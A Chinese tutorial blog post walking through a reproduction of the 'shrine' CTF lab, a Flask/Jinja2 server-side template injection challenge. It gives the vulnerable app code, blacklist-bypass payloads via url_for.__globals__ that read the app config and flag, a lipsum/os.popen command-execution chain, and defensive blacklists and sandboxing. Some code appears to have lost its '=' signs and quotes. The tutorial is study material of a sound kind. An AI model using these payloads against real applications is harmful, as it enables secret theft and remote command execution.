当前位置：首页 > article >正文

保姆级教程：手把手复现攻防世界shrine靶场（Flask+Jinja2 SSTI）

article 2026/3/22 21:48:35

从零构建Flask SSTI靶场绕过黑名单获取FLAG的实战指南第一次接触CTF中的SSTI漏洞时我完全被那些奇怪的{{}}符号和魔术方法搞晕了。直到亲手搭建环境复现漏洞才真正理解模板注入的精妙之处。本文将带你从零开始完整复现攻防世界shrine靶场的SSTI漏洞利用过程特别适合刚入门Web安全的新手。1. 环境搭建与靶场初始化在开始之前我们需要准备以下工具Python 3.6推荐3.8版本Flask框架本文使用2.0.1版本任意代码编辑器VS Code/PyCharm等浏览器或Burp Suite等HTTP工具首先创建项目目录并安装依赖mkdir shrine_target cd shrine_target python -m venv venv source venv/bin/activate # Windows使用 venv\Scripts\activate pip install flask2.0.1接着创建app.py文件写入靶场核心代码import flask import os app flask.Flask(__name__) app.config[FLAG] os.environ.pop(FLAG) app.route(/) def index(): return open(__file__).read() app.route(/shrine/path:shrine) def shrine(shrine): def safe_jinja(s): s s.replace((, ).replace(), ) blacklist [config, self] return .join([{{% set {}None%}}.format(c) for c in blacklist]) s return flask.render_template_string(safe_jinja(shrine)) if __name__ __main__: app.run(debugTrue)设置环境变量并启动服务export FLAGflag{test_flag_for_shrine} python app.py注意Windows系统使用set FLAGflag{test_flag_for_shrine}设置环境变量2. 代码审计与漏洞分析让我们拆解这段代码的关键安全点敏感数据存储app.config[FLAG]将flag存入应用配置os.environ.pop(FLAG)确保环境变量中不留痕迹路由设计/路由直接返回源码自解释型靶场/shrine/path:shrine接收动态路径参数过滤机制s s.replace((, ).replace(), ) # 过滤所有括号 blacklist [config, self] # 黑名单变量模板预处理{{% set configNone%}}{{% set selfNone%}} 用户输入关键漏洞点在于虽然过滤了config和self变量但未限制通过对象属性访问config的方式。3. 黑名单绕过技术详解常规SSTI payload如{{config}}会被拦截我们需要寻找替代方案。Flask在渲染模板时会自动注入以下有用对象对象/函数类型可用性url_for函数可用get_flashed_messages函数可用request对象可用session对象可用利用函数对象的__globals__属性可以绕过限制{{ url_for.__globals__[current_app].config }}这个payload的工作流程url_for是Flask注入的全局函数__globals__包含函数定义时的全局命名空间current_app指向Flask应用实例.config访问应用配置字典4. 实战漏洞利用步骤4.1 基础测试首先测试基本模板注入http://127.0.0.1:5000/shrine/{{7*7}}如果返回49说明存在模板注入。4.2 绕过括号过滤尝试包含括号的payload会失败http://127.0.0.1:5000/shrine/{{.__class__}}因为所有括号都被移除了。4.3 使用属性访问链构造不需要括号的payloadhttp://127.0.0.1:5000/shrine/{{url_for.__globals__.current_app.config}}4.4 最终payload由于.和[]在属性访问中等价以下两种形式都可以{{url_for.__globals__[current_app].config[FLAG]}} {{get_flashed_messages.__globals__.current_app.config.FLAG}}在浏览器中访问http://127.0.0.1:5000/shrine/{{url_for.__globals__[current_app].config[FLAG]}}4.5 常见问题排查返回空白页检查Flask版本pip show flask确保环境变量FLAG已设置500内部错误可能是Jinja2渲染错误检查payload中的特殊字符是否被编码黑名单生效确保没有直接使用config或self使用__globals__间接访问5. 防御方案与安全实践理解了攻击原理后我们来看如何加固应用更严格的黑名单blacklist [config,self,__globals__,_,|join,mro]使用沙盒环境from jinja2.sandbox import SandboxedEnvironment env SandboxedEnvironment()输入验证def validate_input(input_str): forbidden [{{,}},__] return not any(f in input_str for f in forbidden)最小权限原则不要将敏感数据存储在应用配置中使用单独的密钥管理系统在开发过程中可以定期使用以下工具进行安全检查banditPython代码静态分析工具sqlmap虽然主要用于SQL注入但也能检测部分SSTI自定义模糊测试脚本6. 扩展实验与学习建议为了加深理解建议尝试以下实验修改黑名单测试添加url_for到黑名单后如何绕过尝试使用request对象获取配置不同版本影响pip install flask1.0.2测试旧版本是否存在差异替代利用链{{lipsum.__globals__.os.popen(id).read()}}推荐的学习路径先掌握Python魔术方法__class__、__base__等学习Jinja2模板语法研究Flask框架的上下文机制练习CTF中其他SSTI题目记得在实验环境中操作不要在生产系统尝试这些技术。理解漏洞原理的目的是为了构建更安全的系统而非实施非法攻击。

保姆级教程：手把手复现攻防世界shrine靶场（Flask+Jinja2 SSTI）

相关文章：

保姆级教程：手把手复现攻防世界shrine靶场（Flask+Jinja2 SSTI）

Arduino Uno引脚全解析：从电源管理到PWM调光，新手必看的实战指南

基于Docker和Orthanc构建高效医学影像存储系统的实践指南

NXP i.MX8M Plus Cortex-M7多核通信与实时控制开发实战

计算机毕设 java基于微信小程序点餐系统的设计与实现微信小程序智能点餐平台开发基于 SpringBoot 的餐饮在线点餐系统设计

LeetCode 48 1886.矩阵旋转与判断

Comsol纳米摩擦发电机仿真计算模型探索

计算机毕设 java 燐燐开花二手交易系统 Java 二手商品在线交易与管理平台开发基于 SpringBoot 的二手交易商城系统实现

CAD二次开发实战：5分钟搞定TXT坐标转DWG图纸（C#代码详解）

vue+python人工智能AI问答时代个人计算机的安全防护科普系统

腾讯云GPU实例上，用Isaac Sim 5.0和Isaac Lab搭建GR00T仿真环境，保姆级避坑指南

保姆级教程：从下载到配置，手把手搞定CANoe车载测试环境（附CAN盒选购指南）

vue+python产品售后服务跟踪系统的设计与实现6ffp13w7

华为无线网络部署实战：基于RADIUS认证的企业级WLAN配置指南

Python实战：用中智集解决模糊决策问题（附完整代码）

银监会G01报表填报避坑指南：最新251版与231版差异全解析

实验室旧服务器（Ubuntu 18）无网环境，如何用Ollama+DeepSeek R1搭建本地AI助手（附Open WebUI白屏解决方案）

永磁同步电机PMSM参数辨识与SVPWM矢量控制仿真探索

双向Buck-Boost变换器：电压外环与电流内环控制的平均电流管理技术，实现模式切换无过压过...

从CMT2300A实战出发：Sub1G射频匹配电路设计要点与315MHz应用详解

Comsol 中光子晶体仿真：拓扑荷、偏振态及相关特性探索

半波整流电路DIY实战：从零搭建一个简易电源（附波形实测对比）

Comsol 下复合绝缘子的仿真探索

Comsol中光子晶体光纤相关特性计算漫谈

霍尔木兹海峡：帝国黄昏的祭坛？

人-机交互是新文科与新理科融合的最佳窗口

人机协作的核心困局，终于被这篇顶会论文破解了

从零到全网通：一个实验彻底搞懂VLAN、三层交换与静态路由（华为eNSP实战）

交换机堆叠与集群完全指南：从入门到实战，一篇搞定所有难题

人工智能如何改变 Anthropic 的工作方式47